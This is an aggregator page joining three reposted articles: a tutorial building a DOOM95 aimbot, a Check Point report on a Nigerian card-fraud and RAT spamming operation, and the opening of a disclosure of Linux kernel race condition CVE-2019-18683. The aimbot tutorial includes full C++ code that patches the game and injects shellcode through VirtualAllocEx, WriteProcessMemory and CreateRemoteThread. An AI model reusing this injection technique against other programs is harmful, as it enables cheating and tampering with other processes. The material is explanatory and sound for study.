Nytro

DOOM95 | Making an aimbot Reverse Engineering exploit 1 5d In the name of Allah, the most beneficent, the most merciful. Introduction “.الأفكار تغير طابعك، أما الأفعال فتغير واقعك” I’ve played lots of classic games as a child, one that I particularly enjoyed was called DOOM, its concept was overly simple: Kill monsters that spawn all over the map. Collect items. Unlock each level’s secret. But as the saying goes: “There is beauty in simplicity”. Those days are long gone, and although everything that surrounds me changed, I didn’t. I guess few things never vanish. Note: I might do things wrong, but it’s all for fun anyway ! And so it all began The shareware is available to download from ModDB 7. I started off by playing the game for a while, it reminded me of the implemented movement system. The left/right arrow-keys allow screen rotation. While up/down keys render forward and backward moves possible. In order to look for the Image’s entry point, I used WinDBG and attached to Doom95.exe process. As you may have noticed, I’m running on a 64-bit machine. But the executable is 32-bit: IMAGE_DOS_HEADER’s lfanew holds the Offset to the PE signature. – The field next to “PE\x00\x00” is called ‘Machine’, a USHORT indicating its type. so I proceeded to switch to x86 mode using wow64exts. – I then looked-up “Doom” within loaded modules, and used $iment to extract the specified module’s entry point. 0:011:x86> lm m Doom* start end module name 00400000 00690000 Doom95 C (no symbols) 10000000 10020000 Doomlnch C (export symbols) Doomlnch.dll 0:011:x86> ? $iment(00400000) Evaluate expression: 4474072 = 004444d8 Jumping to that address in IDA reveals the function of interest: _WinMain. The search for parts with beneficial information started. push eax ; nHeight add edx, ebx push edx ; nWidth push 0 ; Y push 0 ; X push 0x80CA0000 ; dwStyle push offset WindowName ; "Doom 95" push offset ClassName ; "Doom95Class" push 0x40000 ; dwExStyle call cs:CreateWindowExA The static WindowName used by the call will result in our fast retrieval of Doom’s PID. The combination of FindWindow() and GetWindowThreadProcessId() makes this possible. HWND DoomWindow; DWORD PID; DoomWindow = FindWindow(NULL, _T("Doom 95")); if (! DoomWindow) { goto out; } GetWindowThreadProcessId(DoomWindow, &PID); printf("PID: %d\n", PID); out: return 0; The next thing that caught my eye in the _WinMain procedure were the following lines. loc_43AF74: mov edi, 1 mov eax, ds:dword_60B00C xor ebp, ebp mov ds:dword_60B450, edi mov ds:dword_4775CC, ebp cmp eax, edi jz short loc_43AFB8 call cs:GetCurrentThreadId push eax ; dwThreadId mov edx, ds:hInstance push edx ; hmod push offset fn ; lpfn push 2 ; idHook call cs:SetWindowsHookExA mov ds:hhk, eax The function SetWindowsHookEx installs a hook(fn) within the current thread to monitor System Events. This example specifically uses an idHook that equals 2, which according to MSDN refers to WH_KEYBOARD. The callback function has the documented KeyboardProc prototype. It captures the Virtual-Key code in wParam. On top of that, the fn function invokes GetAsyncKeyState to check if a specific key is pressed too: The function that handles arrow-keys is sub_442A90. – loc_439229: mov ebx, [esp+2Ch+v14] mov edx, [esp+2Ch+lParam] mov eax, esi call sub_442A90 Player information Our ignorance of the structure stored within memory puts us at a disadvantage. In order to find where Health is mainly stored, I’ll be using Cheat Engine with the assumption that it is a DWORD(4 bytes😞 “\x64\x00\x00\x00”. I’ll then proceed to get the character damaged, and ‘Next Scan’ for the new value. We end up with 5 different pointers. The last one is of a black color, meaning that it is a dynamic address, modifying it doesn’t result in any observable change. Others are clearly static, modifying 3/4 of them leads to restoring the original value, which meant that the 1/4 left is the parent, and the rest just copy its value. 00482538: Health that appear on the screen. 03682944: A promising address because it is not updated with the parent. Health is stored in two different locations, which means one is nothing but a decoy. I set the first one’s value to 1, and then got attacked by a monster. The result is: The value that appears on the screen hangs at 0, and the character doesn’t die. While the second kept decreasing on each attack, meaning that it effectively held the real value. We need to inspect the memory region by selecting the value and clicking CTRL+B. We can change the Display Type from Byte hex to 4 Byte hex. – – This is easier to work with, I started searching for the closest pointer in a limited range, and it turned out to be 3682A24. We then goto address to see its content: Notice that the Object’s health is empty, and that the struct holds a Backward and Forward link at its start. A spark The idea that saved me a lot of time! CHEAT CODES 19, I was both happy and shocked to find out that they really existed! DOOMWiki includes messages that appear on detection of each message. Two commands were exceptional because of the information they manipulate. image1017×39 4.9 KB – image771×52 24.7 KB The magical keywords: “ang=” and “BY REQUEST…”. The first one’s usage occurs in: loc_432776: mov eax, offset off_4669BC movsx edx, byte ptr [ebp+4] call sub_414E50 test eax, eax jz short loc_4327D4 mov edx, ds:dword_482A7C lea eax, ds:0[edx*8] add eax, edx lea eax, ds:0[eax*4] sub eax, edx mov eax, ds:dword_482518[eax*8] mov ebx, [eax+10h] push ebx mov ecx, [eax+0Ch] push ecx mov esi, [eax+20h] push esi push offset aAng0xXXY0xX0xX ; "ang=0x%x;x,y=(0x%x,0x%x)" push offset unk_5F2758 call sprintf_ This is important and worthy to be added to our CE Table. A struct layout is also to be concluded: @) +0x10: y @) + 0xC: x @) +0x20: angle I immediately noticed the missing Z coordinate. I knew it existed, I mean, there’s stairs. (Hey, don’t laugh! ) I ended up realizing that it is at +0x14 after a few tests. (Up and down we go.) I knew that even if the enemy is on a different altitude: The shot still hits, and so I ignored Z. X, Y and Angle on the other hand are majorly important because of distance calculation and angle measurement. The values they held look weird, are they floats? No, doesn’t look like it. All I knew for now is that the view changes upon modification. Moving on to the second: loc_432533: mov eax, offset off_466898 movsx edx, byte ptr [ebp+4] call sub_414E50 test eax, eax jz short loc_43255E mov eax, ds:dword_5F274C mov dword ptr [eax+0D8h], offset aByRequest___ ; "By request..." call sub_420C50 jmp loc_4326BA We can see that it only passes execution to sub_420C50, and that’s where the magic happens. sub_420C50 proc near push ebx push ecx push edx push esi mov esi, ds:dword_484CFC cmp esi, offset dword_484CF8 jz short loc_420C92 loc_420C62: cmp dword ptr [esi+8], offset sub_4250D0 jnz short loc_420C87 test byte ptr [esi+6Ah], 40h jz short loc_420C87 cmp dword ptr [esi+6Ch], 0 jle short loc_420C87 mov ecx, 2710h mov eax, esi xor ebx, ebx xor edx, edx call sub_422370 loc_420C87: mov esi, [esi+4] cmp esi, offset dword_484CF8 jnz short loc_420C62 loc_420C92: pop esi pop edx pop ecx pop ebx retn sub_420C50 endp We can see that it traverses a list of Objects, starting with [484CFC] and ending if the Forward link(+4) equals 484CF8. The inclusion of Player Object in the list indicates that it contains all available Entities. The three checks there are: [Entity + 0x08] == 0x4250D0 [Entity + 0x6A] & 0x40 [Entity + 0x6C] > 0 I was curious on what the Player Object held at those Offsets: @) + 0x8: Function pointer(Pass). @) +0x6A: Byte(Error), seems like IsMonster check. @) +0x6C: Health(Pass). A small mistake “Did anyone do this before?”, I wondered. So I searched for: intext:“ang=0x%x;x,y=(0x%x,0x%x)” doom And well, I found out that the source code was available. At first I was mad, because I spent about 3 to 4 days to get the results previously stated. But, hey! I needed more information anyway, and this was an easy road showing up. – – So the structure we look for is defined in d_player.h 3, the interesting element’s name is mo. // // Extended player object info: player_t // typedef struct player_s { mobj_t* mo; ... Its nature is mobj_t, declared in p_mobj.h 1. // Map Object definition. typedef struct mobj_s { // List: thinker links. thinker_t thinker; // Info for drawing: position. fixed_t x; fixed_t y; fixed_t z; // More list: links in sector (if needed) struct mobj_s* snext; struct mobj_s* sprev; //More drawing info: to determine current sprite. angle_t angle; // orientation ... The size of thinker_t is: sizeof(PVOID) * 3 = 4 * 3 = 12. Then comes X, Y and Z at (0x0C, 0x10, 0x14). Two pointers @0x18 are ignored(4 * 2 = 8). Angle is at 0x20. ... int health; // Movement direction, movement generation (zig-zagging). int movedir; // 0-7 int movecount; // when 0, select a new dir // Thing being chased/attacked (or NULL), // also the originator for missiles. struct mobj_s* target; ... The target element is interesting, it supposedly holds a pointer to the Map Object being attacked! Calculating its offset isn’t that hard, because we know that Health is at 0x6C. FIELD_OFFSET(mobj_t, target) = 0x6C + sizeof(int) * 3 = 0x78. The following line in r_local.h indicates that there’s a lookup table/function for Angles, explaining why there’s weird values therein. // Binary Angles, sine/cosine/atan lookups. #include "tables.h" It’s time to see what the target element holds for us! Since I just started up the game, its value is NULL. Attacking or getting attacked by a monster leads to a value change. But there is no update after killing the monster, hmmm. The health is the only indicator of death if it is <= 0. And that’s not the only problem: Attacking a second Monster doesn’t result in any change occuring. Since I want it to be regularly updated, I had to find a way around it. I restarted Doom95.exe, selected the Pointer to Player’s Target and: – – – We can now start fighting an enemy: This is the instruction responsible for writing to the Player’s Target element. Going back a little in disassembly window, there are some simple checks: Is the Target NULL? Is it equal to the Player itself? The origin of EBX register is the selected instruction, and its location is: 00422684. All I had to do is find a location where to place a JMP 422684. I ended up choosing 0042264F: – – The sequence of bytes turns from {0x7D, 0x1C} to {0xEB, 0x33}, we aren’t destroying any instructions after it. Let’s now see if it changes on each attack: Monster #1: Monster #2: PERFECT! Last piece of the puzzle Monsters could accurately aim at my character. I knew a function responsible for angle measurement existed, I just had to find it. After a few hours searching, I ended up looking in p_enemy.c 1; boolean P_CheckMeleeRange (mobj_t* actor) { mobj_t* pl; fixed_t dist; if (!actor->target) return false; pl = actor->target; dist = P_AproxDistance (pl->x-actor->x, pl->y-actor->y); if (dist >= MELEERANGE-20*FRACUNIT+pl->info->radius) return false; if (! P_CheckSight (actor, actor->target) ) return false; return true; } A collection of interesting functions! P_AproxDistance() P_CheckSight() And the most promising one: R_PointToAngle2(), and its definition is the following: angle_t R_PointToAngle2 ( fixed_t x1, fixed_t y1, fixed_t x2, fixed_t y2 ) { viewx = x1; viewy = y1; return R_PointToAngle (x2, y2); } I knew the Player’s X, Y were read right before invokation. I used this information to trace the calls and watched for accesses: – Once a monster aims at us, we get results: image407×552 12.2 KB I started with those with the least hit-count at the middle. The second one looks like the thing we’re looking for! It prepares to call 0042DB10 by loading the Target in EAX and storing its (X, Y) coordinates in EBX and ECX, while EAX and EDX hold those of the monster. We can deduce that it is a __fastcall. Disassembling the function shows: Looks familiar! It is R_PointToAngle2() @ 0042DB10 ! With that in mind, locating this function is made easier. // // A_FaceTarget // void A_FaceTarget (mobj_t* actor) { if (!actor->target) return; actor->flags &= ~MF_AMBUSH; actor->angle = R_PointToAngle2 (actor->x, actor->y, actor->target->x, actor->target->y); if (actor->target->flags & MF_SHADOW) actor->angle += (P_Random()-P_Random())<<21; } I’ll just use IDA. – – Looks like it, it starts by returning if Target is NULL, then ANDs [Monster+0x68] with 0xDF. What’s sad, is that I was looking at it since the beginning in CE, welp . A_FaceTarget is at 0041F670. The making All that we’ve learned about the game will allow us to start wrapping things in C++. Let’s create ADoom.h: #ifndef __ADOOM_H__ #define __ADOOM_H__ class ADoom { public: ADoom(DWORD); ~ADoom(); private: HANDLE DH; }; #endif And ADoom.c: #include <cstdio> #include <cstdlib> #include <stdexcept> #include <tchar.h> #include <Windows.h> #include "ADoom.h" ADoom::ADoom(DWORD CPID) { DH = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CPID); if (DH != INVALID_HANDLE_VALUE) { return; } throw std::runtime_error("Can't open process!"); } ADoom::~ADoom(){ CloseHandle(DH); } int main() { HWND DoomWindow; DWORD PID; DoomWindow = FindWindow(NULL, _T("Doom 95")); if (! DoomWindow) goto out; GetWindowThreadProcessId(DoomWindow, &PID); try { ADoom DAim(PID); } catch (const std::runtime_error &err) { }; while (1) { Sleep(1); } out: return 0; } I’ll create functions that read(rM)/write(wM) to the process memory by extending both the header and source file. We are going to use two WINAPI calls for that purpose: ReadProcessMemory() and WriteProcessMemory(). | | | | | – template<typename ReadType> ReadType rM(DWORD, DWORD); BOOL wM(DWORD, PVOID, SIZE_T); – template<typename ReadType> ReadType ADoom::rM(DWORD RAddress, DWORD Offset) { ReadType Result; PVOID External = reinterpret_cast<PVOID>(RAddress + Offset); ReadProcessMemory(DH, External, &Result, sizeof(Result), NULL); return Result; } BOOL ADoom::wM(DWORD RAddress, PVOID LAddress, SIZE_T Size) { BOOL Status = FALSE; PVOID External = reinterpret_cast<PVOID>(RAddress); if (WriteProcessMemory(DH, External, LAddress, Size, NULL)) { Status = TRUE; } return Status; } Let’s check if Player’s Object manipulation is possible: try { ADoom DAim(PID); DWORD Corrupt = 0x12345678, Player, PPlayer = 0x482518; Player = DAim.rM<DWORD>(PPlayer, 0); printf("Player Object @ %lX\n", Player); DAim.wM(PPlayer, &Corrupt, sizeof(Corrupt)); puts("Corrupted the Player Object."); } catch (const std::runtime_error &err) { } – The Doom95.exe process crashes, success. We have to apply the 2 byte patch and keep an eye on the Player’s Target value. try { ADoom DAim(PID); BYTE Patch[2] = {0xEB, 0x33}; DWORD PAddress = 0x42264F; DWORD Player, PPlayer = 0x482518; int THealth; DWORD OTarget = 0, Target; Player = DAim.rM<DWORD>(PPlayer, 0); printf("Player Object @ %lX\n", Player); printf("Applying Patch @ %lX\n", PAddress); DAim.wM(PAddress, &Patch[0], sizeof(Patch)); while (true) { Target = DAim.rM<DWORD>(Player, 0x78); // Are we currently engaging the enemy? if (Target != 0) { // If yes, is it already dead? THealth = DAim.rM<int>(Target, 0x6C); if (THealth <= 0) { continue; } /* Uniqueness check. */ if (! OTarget || OTarget != Target) { printf("Current Target @ %lX\n", Target); OTarget = Target; } } } } catch (const std::runtime_error &err) { } – So far so good, we are making progress. At first, I totally forgot about the Health check, and it kept aiming at the dead Monster. It is time to use our knowledge about A_FaceTarget(0041F670). It takes an mobj_t * argument in EAX, and performs a single check(EAX->target != NULL) before calculating and storing the correct angle, this is a minimum of work on our side. All is left to do, is creating a reliable function and storing/running it in the remote thread. VOID _declspec(naked) Reliable(VOID) { __asm { mov eax, 0x482518 // Load PPlayer in EAX mov eax, [eax] // Load Player Object in EAX mov edi, 0x41F670 // Indicate the FP(A_FaceTarget) call edi // Call it ret } } We can compile the executable and load it up in IDA. – Hex-view is synchronized with Disassembly-view, so selecting the first ‘mov’ is all we have to do. That is our function! BYTE Payload[] = {0xB8, 0x18, 0x25, 0x48, 0x00, 0x8B, 0x00, 0xBF, 0x70, 0xF6, 0x41, 0x00, 0xFF, 0xD7, 0xC3}; DWORD PSize = sizeof(Payload); With that done, we need a location to write it to, it needs to be Executable/Readable and Writeable too. In order to get it, we will call VirtualAllocEx(). We have to specify flProtect as PAGE_EXECUTE_READWRITE. Another helper function will be called aM short for allocate Memory. DWORD aM(SIZE_T); – DWORD ADoom::aM(SIZE_T Size) { LPVOID RAddress = VirtualAllocEx(DH, NULL, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); DWORD Cast = reinterpret_cast<DWORD>(RAddress); return Cast; } And then there should be a function to spawn a Thread in Doom95.exe process. We’ll be using CreateRemoteThread(), and wait for it to terminate using WaitForSingleObject(). | | It’ll be called sT. VOID sT(DWORD); – VOID ADoom::sT(DWORD FPtr) { HANDLE RT; RT = CreateRemoteThread(DH, NULL, 0, (LPTHREAD_START_ROUTINE) FPtr, NULL, 0, NULL); if (RT != INVALID_HANDLE_VALUE) { WaitForSingleObject(RT, INFINITE); } } That’s all we need, now we can implement the whole loop: try { ADoom DAim(PID); BYTE Patch[2] = {0xEB, 0x33}; DWORD PAddress = 0x42264F; BYTE Payload[] = {0xB8, 0x18, 0x25, 0x48, 0x00, 0x8B, 0x00, 0xBF, 0x70, 0xF6, 0x41, 0x00, 0xFF, 0xD7, 0xC3}; DWORD Location, PSize = sizeof(Payload); DWORD PPlayer = 0x482518, Player, Target; int THealth; /* Patch: An unconditional JMP instruction that allows Player->target to be updated on every attack. */ printf("Applying Patch @ %lX\n", PAddress); DAim.wM(PAddress, Patch, sizeof(Patch)); printf("Allocating Memory(%d)\n", PSize); Location = DAim.aM(PSize); printf("Storing Function @ %lX\n", Location); DAim.wM(Location, Payload, PSize); puts("[0x00sec] Aimbot starting."); while (TRUE) { Player = DAim.rM<DWORD>(PPlayer, 0); Target = DAim.rM<DWORD>(Player, 0x78); // Did any enemy attack us? if (Target != 0) { // If yes, is it still alive? THealth = DAim.rM<int>(Target, 0x6C); if (THealth > 0) { // Aim at it. DAim.sT(Location); } } } } catch (const std::runtime_error &err) { } – And it works! End It took many attempts to get to the final product, but it certainly was fun! I could not include pictures or GIFs from the game because I didn’t find a way to do it, for that, I apologize. Lots of modifications were made to guarantee reliability, an example would be the Player object is updated on two events: Death/Level Change. And I also got rid of some functions such as: VOID GetMonsters(vector<DWORD> *M, HANDLE Proc) { DWORD First = 0x484CFC, Last = 0x484CF8; int MHealth; UCHAR IsMonster; First = rM<DWORD>(First, Proc); Last = rM<DWORD>(Last, Proc); do { IsMonster = rM<UCHAR>(First + 0x6A, Proc); MHealth = rM<int>(First + 0x6C, Proc); // Is it a monster and is it alive? if ((IsMonster & 0x40) && (MHealth > 0)) { M->push_back(First); } } while ((First = rM<DWORD>(First + 4, Proc)) != Last); } I didn’t even need to include <cmath> in the end! NIAHAHAHA! ~ exploit Sursa: https://0x00sec.org/t/doom95-making-an-aimbot/19862

The Inside Scoop on a Six-Figure Nigerian Fraud Campaign March 17, 2020 Cybercrime is usually a one-way street. Shady types send their malicious documents and Trojans downstream to us innocent folk. Worst-case scenario, we get infected. Best-case scenario, we smirk, hit “delete” and move on with our lives. Either way, we’re left with many lingering questions. Who sends these out? Where did they get our email address? Do they really make money doing this? How much? If you’ve asked yourself these questions too many times, today is your lucky day. Meet A██████████ A███████ D██████ton, who we’ll call Dton for short: Dton is an upstanding Nigerian citizen. He believes in professionalism, hard work and excellence. He’s a leader, a content creator, an entrepreneur and an innovator; an accomplished business administrator; a renaissance man who is adored by his colleagues. Even his primary school teacher is willing to sing his praises on a phone call’s notice. But behind this positive persona hides a dark secret. In the best comic book villain tradition, Dton leads a double life: By day, he is Dton, administrator of businesses and achiever of organizational goals. But by night, he is Bill Henry, Cybercriminal Entrepreneur. Bill is a regular customer at the Ferrum shop – a fine business that stocks north of 2,500,000 stolen credit card credentials. During the years 2013-2020, the account he regularly logs into has been used to purchase over $13,000 worth in stolen credit card credentials. Once Bill gets his hand on stolen credit card credentials, he is quick to monetize his new asset: This typical charge is for 200,000 Nigerian Naira (NAN), the equivalent of about $550 USD. Luckily for whoever owns the original credit card used here, the transaction does not go through; but Bill is patient. He tries another merchant, and if that fails, he buys another credit card for another $4 or $16 and tries again. Eventually a transaction goes through. A back-of-the-envelope calculation shows that during the years 2013-2020, the $13,000 spent by this account were converted into about 1,000 credit cards, which were then fraudulently charged for a total easily exceeding $100,000 — probably several times that. You might object that the above story is a violation of basic economics. If a stolen credit card can be fraudulently charged for $500, why would anyone sell it for only $10? Well, stealing credit card credentials is easy and anonymous, given that banking malware and point-of-sale malware is everywhere and is notoriously difficult to trace back to whoever wrote and deployed it. Making credit card charges is something else entirely; it carries a whole additional set of risks and requires a distinct set of skills. Chief among those skills is sheer audacity — which Dton has no lack of, as you’ll see soon. Dton’s business has always been his pride, but one thing he could never get to like was having to constantly pay up at the Ferrum shop. He knew that true blood cybercriminals harvest their stolen credentials with their own two hands, fresh from the spam fields covered in morning dew; he longed to have that life. Some times, he would spend the $10 at the Ferrum shop and the transactions wouldn’t even go through. His resentment grew. He was an entrepreneur, not a gambler. No longer content to just buy, sell and monetize victim data, it was a matter of time before Dton dove head-first into the world of DIY stolen credentials. He was buying “leads” – email addresses of potential marks – in bulk. But most of his attention went into buying malicious tools of the trade: Packers and crypters, infostealers and keyloggers, exploits and remote VMs. He had a true passion to play the field and see what worked best for him. Just for malware alone, he purchased and tried out AspireLogger: And Nanocore: And OriginLogger: And many, many other software of the kind that Windows Defender warns you about. Soon, Dton had a complete spamming staging ground — an army of remote, anonymized VMs that he could connect to with a VPN, and were equipped with the necessary tools for his work. On these machines he would take his hand-picked malicious binaries and run them through packers: Wrap them in an appealing malicious document: Carefully pick a message and subject line – then send the result out to a long, long list of potential victims. Shortly after, the victim credentials came pouring in. Nanocore and its ilk delivered. Dton was ecstatic. For Dton, this was a career milestone — but still, not everything was sunshine and rainbows. Sometimes Dton’s tool suppliers would make exaggerated financial demands: In Dton’s place, would you pay $800 to have 3 binaries packed so that they have 0 VirusTotal detections? You probably shouldn’t. VT detection statistics aren’t always up-to-date, and aren’t guaranteed to reflect the full range of protections offered by the vendors involved. Worse yet, Dton wouldn’t always see eye-to-eye with his manager when discussing goals: Yes – Dton has a manager. Possibly his manager also has a manager, and so on for eight tiers, but it grieves us to speculate on that. As you can see, Dton’s manager – “A” for short — periodically sends venture capital and expects handsome returns. If a project is not going well, The Boss gets angry, and as he says, you wouldn’t like him when he’s angry. Dton’s boss rules the workplace with an iron fist, and Dton’s terms of employment apparently demand that he install a Remote Administration Tool (RAT) on his own machine, which his boss can access freely. This leads to some very strange conversations: Yes, Mr. A, relax. Relax about the cybercriminal whose every movement you monitor obsessively, and who just logged in to your Yandex account. Chill. Why would Dton’s boss share his Yandex credentials with his underling so freely? That’s a very good question. Then again, why would they both use the same inbox for stolen victim data and for routine RAT-based workplace monitoring of Dton’s work? Take another look at the stream of incoming victim data: All the recovered data tagged “HP-PC” is monitored data from Dton’s machine, aggregated with the rest of the victim data. In a certain poetic sense, Dton is just another victim. (A famous quote from the social media site, reddit, goes: “I work as a dishwasher, and I come home after hours of work in which I get covered in filth, then I take a shower only to realize… I am the final dish”. This kind of reminded us of that). So: Dton’s career has a promising future, and his RAT-spamming operation is alive and kicking. But conversion rates are not what they could be and Dton’s boss is unhappy. Packing the malware to improve conversion rates comes at an overbearing premium. Dton begins to doubt the validity of the entire setup. He uses brand-name malware, and therefore gets burned by security solutions, since the vendors have a special incentive to go after “household name” malware; if he tries to stave off the detection with artisanal packing / crypting services, he has to pay out the nose. The free-to-use packers on his staging ground VMs just don’t cut it. It then occurs to Dton that there is technically one way out of this bind: write his own RAT. If it’s written from scratch, then it’s novel, and can therefore get around for exactly the same reasons as the novel coronavirus. No one has a signature, no one has a vaccine, none of the existing immune systems have ever seen it before. By the time they figure it out, a lot of damage will already be done. Of course, Dton is no coder. He has to get someone else to do it for him. He receives a recommendation for such a person who hangs out at a certain discord and goes by the name “RATs &exploits”. Mr. &exploits has spoken with many customers before, and has a canned reply for those interested in his services: Dton engages this person, and a deal begins to take shape. RATs&exploits also offers personal one-on-one technical support and hands-on demonstration of how to use the RAT. Here he is demonstrating his use of “Azorult”, a well-known piece of malware, on a virtual machine: Mutual impressions are good, and soon money exchanges hands. Dton’s toolkit has reached the next level. He now has his own personalized, hand-crafted RAT as well as a personalized web client to monitor his victims. He leans back, smiles and surveys his domain. In fact, Dton has not only found a professional contact in this RAT developer, but a true kindred spirit: Or has he? Not much later, Dton is remotely viewing fresh screenshots — taken from the personal machine of the developer he has just done business with. Let us repeat that: Dton, whose business model is infecting many innocent victims with RATs, and whose work is subject to strict surveillance by infecting his own machine with a RAT, commissioned a malware developer to write a personalized RAT for him and then had that developer’s machine compromised with a RAT. There is a decent chance that your brain just got infected with a RAT by reading this sentence. Not one to put all his eggs in one basket, Dton kept pursuing the dream of having his malware packed without having to pay “packing rent”. He soon became interested in dataprotector (datap.pro), a packer which offers a “lifetime package”: Of course, you don’t just purchase something like datap out of the blue. You need to know who to talk to. Dton soon reached his contact person for purchasing datap, who goes by “n0$f3ratu$” (That’s “Nosferatus”, for those in the audience who don’t speak l33t). Wary about investing such a large sum up front, Dton opted for the 45 days package, which is about a tenth of the price. Dton paid up, tried using the product a few times, and soon he was angry. He was not pleased with the product, or the price, or something at any rate. He felt that he should pull a power play to get a better deal, or else that n0$f3ratu$ should have just let him have the lifetime package for $36.50 – and that since he did not, there should be consequences. And then Dton had an idea. Welp. Let’s look at that YouTube link: That’s our friend n0$f3ratu$– teaching people how to bypass Windows Defender using the very same crypter he had just sold Dton. One moment, Dton was working together with this guy; the next, he was stabbing him in the back. Again. Dton does not immediately submit this anonymous report. Instead he uses it to taunt n0$f3ratu$ – who reacts about as positively as you’d expect: We can only speculate on what n0$f3ratu$ means by that. Probably he and Dton got into a very heated debate about the price of the dataprotector lifetime package, and found that their differences were irreconcilable. And thus Dton reached the crowning achievement of his career – majorly angering the technical people on whose work his entire livelihood depended. Way to go, Dton. So, what have we learned? On some level, we know that cybercriminals are flesh and blood. They have feelings, wants and needs; they hold grudges, they make mistakes. But some cybercriminals are much more flesh and blood than others. We can’t put enough emphasis on the absurd contrast between the more professional operations that we have been watching on the one hand, and this absolute train wreck on the other. Somewhere in Russia, as you are reading this, a well-coordinated gang is rotating their C&C servers on a daily basis and signing their malware with a rogue certificate authority. Bugs are corrected, features are introduced, security vendors are watched with a keen eye. Meanwhile, halfway across the earth in Nigeria, Dton is spamming out RATs that all contain hard-coded credentials for the single Gmail inbox the RATs all report to – then purposefully gets himself infected with a copy as well. When business with someone goes well, Dton infects them with a RAT just in case it later turns out to be useful; when business with someone goes less than well, Dton resolves the dispute by reporting them to the Interpol. And you know what? Dton is fine. Dton is living the good life. This is technically a picture of Dton’s colleague, but the point still stands. We don’t need to tell you how to defend yourself against Dton’s RATs, because if you’re reading this, you already know how. Update your web browser. Before clicking a web link, ask yourself who put it there and check out the actual target domain, starting from the top level. Don’t open that unsolicited “invoice” or “shipment notice”; if you do open it, don’t open the attached document; if you do open that, don’t click “enable macros”. It’s all trite advice that’s been repeated a million times – but the people who need to hear it aren’t reading this blog post. That’s how even Dton, a YOLO cybercriminal if we ever saw one, gets plenty of victims and rolls in cash. Talk to your friends about low-effort cybercrime. Tell them that whenever they open an email, they should take a long, hard look at the picture above, and imagine the person pictured there composing that email in a Turbomailer window. And that if the image fits too well, they should think about their next click very carefully. *Note: All personal details have been blurred for the sake of this publication. The full details have been reported to relevant law enforcement officials Sursa: https://research.checkpoint.com/2020/the-inside-scoop-on-a-six-figure-nigerian-fraud-campaign/

CVE-2019-18683: Exploiting a Linux kernel vulnerability in the V4L2 subsystem This article discloses exploitation of CVE-2019-18683, which refers to multiple five-year-old race conditions in the V4L2 subsystem of the Linux kernel. I found and fixed them at the end of 2019. I gave a talk at OffensiveCon 2020 about it (slides). Here I'm going to describe a PoC exploit for x86_64 that gains local privilege escalation from the kernel thread context (where the userspace is not mapped), bypassing KASLR, SMEP, and SMAP on Ubuntu Server 18.04. First of all let's watch the demo video. Vulnerabilities These vulnerabilities are caused by incorrect mutex locking in the vivid driver of the V4L2 subsystem (drivers/media/platform/vivid). This driver doesn't require any special hardware. It is shipped in Ubuntu, Debian, Arch Linux, SUSE Linux Enterprise, and openSUSE as a kernel module (CONFIG_VIDEO_VIVID=m). The vivid driver emulates video4linux hardware of various types: video capture, video output, radio receivers and transmitters and a software defined radio receivers. These inputs and outputs act exactly as a real hardware device would behave. That allows to use this driver as a test input for application development without requiring special hardware. Kernel documentation describes how to use the devices created by the vivid driver. On Ubuntu, the devices created by the vivid driver are available to normal users since Ubuntu applies the RW ACL when the user is logged in: a13x@ubuntu_server_1804:~$ getfacl /dev/video0 getfacl: Removing leading '/' from absolute path names # file: dev/video0 # owner: root # group: video user::rw- user:a13x:rw- group::rw- mask::rw- other::--- (Un)fortunately, I don't know how to autoload the vulnerable driver, which limits the severity of these vulnerabilities. That's why the Linux kernel security team has allowed me to do full disclosure. Bugs and fixes I used the syzkaller fuzzer with custom modifications to the kernel source code and got a suspicious kernel crash. KASAN detected use-after-free during linked list manipulations in vid_cap_buf_queue(). Investigation of the reasons led me quite far from the memory corruption. Ultimately, I found that the same incorrect approach to locking is used in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), and sdr_cap_stop_streaming(). This resulted in three similar vulnerabilities. These functions are called with vivid_dev.mutex locked when streaming is being stopped. The functions all make the same mistake when stopping their kthreads that need to lock this mutex as well. See the example from vivid_stop_generating_vid_cap(): /* shutdown control thread */ vivid_grab_controls(dev, false); mutex_unlock(&dev->mutex); kthread_stop(dev->kthread_vid_cap); dev->kthread_vid_cap = NULL; mutex_lock(&dev->mutex); But when this mutex is unlocked, another vb2_fop_read() can lock it instead of the kthread and manipulate the buffer queue. That creates an opportunity for use-after-free later when streaming is started again. To fix these issues, I did the following: 1. Avoided unlocking the mutex on streaming stop. For example, see the diff for vivid_stop_generating_vid_cap(): /* shutdown control thread */ vivid_grab_controls(dev, false); - mutex_unlock(&dev->mutex); kthread_stop(dev->kthread_vid_cap); dev->kthread_vid_cap = NULL; - mutex_lock(&dev->mutex); 2. Used mutex_trylock() with schedule_timeout_uninterruptible() in the loops of the vivid kthread handlers. The vivid_thread_vid_cap() handler was changed as follows: for (;;) { try_to_freeze(); if (kthread_should_stop()) break; - mutex_lock(&dev->mutex); + if (!mutex_trylock(&dev->mutex)) { + schedule_timeout_uninterruptible(1); + continue; + } ... } If mutex is not available, the kthread will sleep one jiffy and then try again. If that happens on streaming stop, in the worst case the kthread will go to sleep several times and then hit break on another loop iteration. So, in a certain sense, stopping vivid kthread handlers was made lockless. Sleeping is hard I did responsible disclosure just after I finished my PoC exploit (I was at the Linux Security Summit in Lyon at the time). I sent the description of the vulnerabilities, fixing patch, and PoC crasher to security@kernel.org. Linus Torvalds replied in less than two hours (great!). My communication with him was excellent this time. However, it took us four versions of the patch to do the right thing just because sleeping in kernel is not so easy. The kthread in the first version of my patch didn't sleep at all: if (!mutex_trylock(&dev->mutex)) continue; That solved the vulnerability but -- as Linus noticed -- also introduced a busy-loop that can cause a deadlock on a non-preemptible kernel. I tested the PoC crasher that I sent them on the kernel with CONFIG_PREEMPT_NONE=y. It managed to cause a deadlock after some time, just like Linus had said. So I returned with a second version of the patch, in which the kthread does the following: if (!mutex_trylock(&dev->mutex)) { schedule_timeout_interruptible(1); continue; } I used schedule_timeout_interruptible() because it is used in other parts of vivid-kthread-cap.c. The maintainers asked to use schedule_timeout() for cleaner code because kernel threads shouldn't normally take signals. I changed it, tested the patch, and sent the third version. But finally after my full disclosure, Linus discovered that we were wrong yet again: I just realized that this too is wrong. It _works_, but because it doesn't actually set the task state to anything particular before scheduling, it's basically pointless. It calls the scheduler, but it won't delay anything, because the task stays runnable. So what you presumably want to use is either "cond_resched()" (to make sure others get to run with no delay) or "schedule_timeout_uninterruptible(1)" which actually sets the process state to TASK_UNINTERRUPTIBLE. The above works, but it's basically nonsensical. So it was incorrect kernel API usage that worked fine by pure luck. I fixed that in the final version of the patch. Later I prepared a patch for the mainline that adds a warning for 